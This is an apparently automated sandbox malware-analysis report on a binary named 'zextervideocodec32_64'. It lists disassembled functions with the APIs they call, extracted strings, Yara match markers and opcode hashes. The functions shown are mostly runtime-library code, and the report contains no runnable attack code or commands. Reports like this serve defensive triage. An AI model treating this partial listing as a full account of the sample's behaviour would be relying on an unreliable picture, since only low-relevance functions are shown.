                                                                                                      • Opcode ID: b9cbbc8c0ea8c55567d2836c108039438420031f5f1a8c001c392d4ee2e516ef
                                                                                                      • Instruction ID: 062b5ae98ab9030f653b1bc9de29488605c9062d752432f9c8a00fdb9c8ae52c
                                                                                                      • Opcode Fuzzy Hash: b9cbbc8c0ea8c55567d2836c108039438420031f5f1a8c001c392d4ee2e516ef
                                                                                                      • Instruction Fuzzy Hash: 8411E172600305EFDB109F60D884B66BBB9FF44745F2044ADFA019B140DBB1F951DBA0
                                                                                                      Function 02BDC81B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                      • String ID:
                                                                                                      • API String ID: 3016257755-0
                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                      • Instruction ID: 5a21314eca21198b6ac330b656d5837b1e543b60c3ebc610b160f6a5e20a9406
                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                      • Instruction Fuzzy Hash: 7F01093208014ABBCF166E94DC41CEE3F66BB18354B488496FA1899121E737E5B5EB81
                                                                                                      Function 02BDBD0D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02BDBD24
                                                                                                        • Part of subcall function 02BDC33B: ___AdjustPointer.LIBCMT ref: 02BDC384
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02BDBD3B
                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 02BDBD4D
                                                                                                      • CallCatchBlock.LIBCMT ref: 02BDBD71
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID:
                                                                                                      • API String ID: 2633735394-0
                                                                                                      • Opcode ID: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                                                      • Instruction ID: 31f8bf85ce7c6b861e58a79f69c9da683055a1fdea2b64910d8a9b911fc88324
                                                                                                      • Opcode Fuzzy Hash: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                                                      • Instruction Fuzzy Hash: 1E010C32000549BBCF125F55CC00EDA7FBAFF49759F154595F91866120E772E461DFA0
                                                                                                      Function 02BC247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC24A9
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC24B8
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC24CD
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC24D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 4018804020-0
                                                                                                      • Opcode ID: c14e0e647dd46feac88e84c6bf8165465172acf9ef941f50c3dcb68a88ff3e6a
                                                                                                      • Instruction ID: b8bc5adc01df4ab4f1d85c6f4728473c1206a39318e22c8123de940099621864
                                                                                                      • Opcode Fuzzy Hash: c14e0e647dd46feac88e84c6bf8165465172acf9ef941f50c3dcb68a88ff3e6a
                                                                                                      • Instruction Fuzzy Hash: DDF03C72540205EFDB00AF69E844F9ABBACFF48751F004459FA05CB142DB71E5618FA0
                                                                                                      Function 02BC2004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC2009
                                                                                                      • RtlDeleteCriticalSection.NTDLL(?), ref: 02BC2028
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC2037
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC204E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                      • String ID:
                                                                                                      • API String ID: 2456309408-0
                                                                                                      • Opcode ID: d5da2a14d17c73afc51d5fbdb974fdcdcd0dd20a0911788463d02fab163058e1
                                                                                                      • Instruction ID: 4c68e3ff0bfe3355b5cc90bee42fffe3aaedfa49501b53b8167c5055f8de93ea
                                                                                                      • Opcode Fuzzy Hash: d5da2a14d17c73afc51d5fbdb974fdcdcd0dd20a0911788463d02fab163058e1
                                                                                                      • Instruction Fuzzy Hash: 26016D71500604DFCB39AF54E908B9AB7F9FF04719F10499EE94682590CBB46644DF94
                                                                                                      Function 02BC1E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Event$H_prologSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1765829285-0
                                                                                                      • Opcode ID: af16470133bee2c36d9220ccd8142c4e1d1e3ad225b6e713952994da874b7583
                                                                                                      • Instruction ID: 43923e020311793f05e9ef787b42c44a3a9cb6153cad4729d8889d388da0a62f
                                                                                                      • Opcode Fuzzy Hash: af16470133bee2c36d9220ccd8142c4e1d1e3ad225b6e713952994da874b7583
                                                                                                      • Instruction Fuzzy Hash: 7BF03036640110DFCF00DF94D8C8B88BBA5FF09311F5085A9F51A9B291CB759854DB51
                                                                                                      Function 02BC9F2B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmove
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 3529519853-655172784
                                                                                                      • Opcode ID: 0b3781e97d1c209d62efa947af6421aefb07ee1853d6d4afacd0348f30c785f6
                                                                                                      • Instruction ID: ce4ada30f5a790886e5ade3f845fada7040a39abf0d161bd82bc060c9ea61bd1
                                                                                                      • Opcode Fuzzy Hash: 0b3781e97d1c209d62efa947af6421aefb07ee1853d6d4afacd0348f30c785f6
                                                                                                      • Instruction Fuzzy Hash: AC615D71D00209DBDF25EFA4C941AEEBBB5EF48310F2081AED515AB141D770AA45CF61
                                                                                                      Function 0040602F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406043
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID: $
                                                                                                      • API String ID: 1807457897-3032137957
                                                                                                      • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                                      • Instruction ID: a42b242f0737112a64efb8245030e7df3adc9bcb2e8c8469847d94988edb9e3f
                                                                                                      • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                                      • Instruction Fuzzy Hash: 7B413731004158AEEB119754DD89BFB3FE9DB06700F1501F6D58BFB1D3C23949648BAA
                                                                                                      Function 02BC534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 02BC535D
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02BC536F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                                      • String ID: \save.dat
                                                                                                      • API String ID: 4128168839-3580179773
                                                                                                      • Opcode ID: 6bde73fc538e00945409e7d3c4b300b43c0e9d987ef7181955e8cc4575b135a8
                                                                                                      • Instruction ID: b0a40054cf2da951ba68419c8f1dfe045bef36ebae0659a0e0f351ed89b81a2a
                                                                                                      • Opcode Fuzzy Hash: 6bde73fc538e00945409e7d3c4b300b43c0e9d987ef7181955e8cc4575b135a8
                                                                                                      • Instruction Fuzzy Hash: 41117D729042016BDB358E258880E9FFF6BDFC2650B2041FDE8467B202D7A31D02C7A0
                                                                                                      Function 02BC3965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC396A
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC39C1
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BCA5F4: __EH_prolog.LIBCMT ref: 02BCA5F9
                                                                                                        • Part of subcall function 02BCA5F4: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA608
                                                                                                        • Part of subcall function 02BCA5F4: __CxxThrowException@8.LIBCMT ref: 02BCA627
                                                                                                      Strings
                                                                                                      • Day of month is not valid for year, xrefs: 02BC39AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Day of month is not valid for year
                                                                                                      • API String ID: 1404951899-1521898139
                                                                                                      • Opcode ID: e193af826ba01cb4db6f880a6ad540227b4df4d5f46807ab8d1003092a6beff3
                                                                                                      • Instruction ID: b5cc62328cd9337714b28d41dab5566794998496e49c15931b1443229ec34308
                                                                                                      • Opcode Fuzzy Hash: e193af826ba01cb4db6f880a6ad540227b4df4d5f46807ab8d1003092a6beff3
                                                                                                      • Instruction Fuzzy Hash: 2901B576810249AADF04EFA4D801AEEB779FF14710F50849EEC05A3210EB704B41CB95
                                                                                                      Function 02BCB0D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::exception::exception.LIBCMT ref: 02BCFAED
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BCFB02
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 4063778783-2104205924
                                                                                                      • Opcode ID: 0f41953f2b979fd062fae52b8c04c91b7a17d89dffc4ed2b9b629505a5cd374c
                                                                                                      • Instruction ID: 4c928ea27e3991fce061a8eedb6016f9ba64a8ae957a691004e7cc4c33d8b544
                                                                                                      • Opcode Fuzzy Hash: 0f41953f2b979fd062fae52b8c04c91b7a17d89dffc4ed2b9b629505a5cd374c
                                                                                                      • Instruction Fuzzy Hash: 52F0827060030967DF08BAA98856DFF73EDEB04218B5005E9A925D2691EB70E904C995
                                                                                                      Function 02BC3C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3C1B
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02BC3C30
                                                                                                        • Part of subcall function 02BD2497: std::exception::exception.LIBCMT ref: 02BD24A1
                                                                                                        • Part of subcall function 02BCA62D: __EH_prolog.LIBCMT ref: 02BCA632
                                                                                                        • Part of subcall function 02BCA62D: __CxxThrowException@8.LIBCMT ref: 02BCA65B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 1300498068-3145022300
                                                                                                      • Opcode ID: e3ccb6c077789547ed5fe0d21219eff1b2c553334a993eb9b91bfbd0dffe82da
                                                                                                      • Instruction ID: c38c2f482701557d05182ef682ef97ff0ec38c2b17354294b49803e96f5e3dce
                                                                                                      • Opcode Fuzzy Hash: e3ccb6c077789547ed5fe0d21219eff1b2c553334a993eb9b91bfbd0dffe82da
                                                                                                      • Instruction Fuzzy Hash: 4EF0A0729001088BCB19EF58D450AEAB775EF51326F2041EEEE075B250DBB29A46CB90
                                                                                                      Function 02BC3881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3886
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38A5
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Day of month value is out of range 1..31, xrefs: 02BC3894
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Day of month value is out of range 1..31
                                                                                                      • API String ID: 3258419250-1361117730
                                                                                                      • Opcode ID: 7b38d0e7182783d7a7c00f2b17b931b43daed87e6915de5d9a7c6960f02f0bc8
                                                                                                      • Instruction ID: 87ebd7953402576ab0e38a869baa13ec975467c14f8c36406bead7eeed72fa5f
                                                                                                      • Opcode Fuzzy Hash: 7b38d0e7182783d7a7c00f2b17b931b43daed87e6915de5d9a7c6960f02f0bc8
                                                                                                      • Instruction Fuzzy Hash: C1E09272A001049BDB28AB9888117DDB779EB08B10F6445CEE90377680DBF119448B91
                                                                                                      Function 02BC38CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC38D2
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38F1
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Year is out of valid range: 1400..10000, xrefs: 02BC38E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Year is out of valid range: 1400..10000
                                                                                                      • API String ID: 3258419250-2344417016
                                                                                                      • Opcode ID: 2228cdbe5def69722a92d70a945ef011eb5ba1f955fff9a895fb27f87e91d662
                                                                                                      • Instruction ID: c0e9d0e1ca3e18e3a434861b060dd3fbff7be95e984e2acbcf3df91221a67676
                                                                                                      • Opcode Fuzzy Hash: 2228cdbe5def69722a92d70a945ef011eb5ba1f955fff9a895fb27f87e91d662
                                                                                                      • Instruction Fuzzy Hash: AFE09272A001049BDB28EB9888117DDB779EB08B10F2445CEE90373680DBF159408B91
                                                                                                      Function 02BC3919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC391E
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC393D
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Month number is out of range 1..12, xrefs: 02BC392C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Month number is out of range 1..12
                                                                                                      • API String ID: 3258419250-4198407886
                                                                                                      • Opcode ID: d6e6421632794416d101f9e2b0eb47ba88ec9adda4876032d93cf60c461f8c31
                                                                                                      • Instruction ID: b4fb7c992fb558782dfd9b2dd4a197c668c1fa8e0e81e03ba399a39c4579b23e
                                                                                                      • Opcode Fuzzy Hash: d6e6421632794416d101f9e2b0eb47ba88ec9adda4876032d93cf60c461f8c31
                                                                                                      • Instruction Fuzzy Hash: B5E0D872A001049BDB28BB98C8117DEB779EB08B11F2445CEE90373680DBF119408FD5
                                                                                                      Function 02BC19C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • TlsAlloc.KERNEL32 ref: 02BC19CC
                                                                                                      • GetLastError.KERNEL32 ref: 02BC19D9
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocErrorH_prologLast
                                                                                                      • String ID: tss
                                                                                                      • API String ID: 249634027-1638339373
                                                                                                      • Opcode ID: be41aed44e6c75b5c93f52eebe68791251fd3f01b1c550f375d1e9981a6e4aa7
                                                                                                      • Instruction ID: 866bb61677b80b6a621b8609d9ed3304f79bddcf529bf5f34fa5939888965e2a
                                                                                                      • Opcode Fuzzy Hash: be41aed44e6c75b5c93f52eebe68791251fd3f01b1c550f375d1e9981a6e4aa7
                                                                                                      • Instruction Fuzzy Hash: 9FE04F329142109B86007A7C980808BFBA49B45270F208BAAEDBE972D1EA7049119BC2
                                                                                                      Function 02BC3BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                                                        • Part of subcall function 02BD2497: std::exception::exception.LIBCMT ref: 02BD24A1
                                                                                                        • Part of subcall function 02BCA62D: __EH_prolog.LIBCMT ref: 02BCA632
                                                                                                        • Part of subcall function 02BCA62D: __CxxThrowException@8.LIBCMT ref: 02BCA65B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 1300498068-3145022300
                                                                                                      • Opcode ID: 73c7405203d3cf30de52ffeb2ee461cd998ebf0274dfec94da9e45403eab6fdb
                                                                                                      • Instruction ID: 9ff9f2764a5c654805e9ca136d45d92882dffecc5434a30e482f7dfab5d1378e
                                                                                                      • Opcode Fuzzy Hash: 73c7405203d3cf30de52ffeb2ee461cd998ebf0274dfec94da9e45403eab6fdb
                                                                                                      • Instruction Fuzzy Hash: DAE092B1900108DBCB28EF98D062BA8BBB1EB04306F6080ECAE0347390DB715A06CF81
                                                                                                      Function 00404A70 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404A98
                                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404ACC
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AE6
                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AFD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3499195154-0
                                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                                      • Instruction ID: e2b6aa67baf941fda6b0a0502f281f3949fe5c10b928d307e266fea8edbc1969
                                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                                      • Instruction Fuzzy Hash: 1E1113B0201601EFC7208F19EE85E227BB5FB857217114A3AF692E65F1D770A845CB4C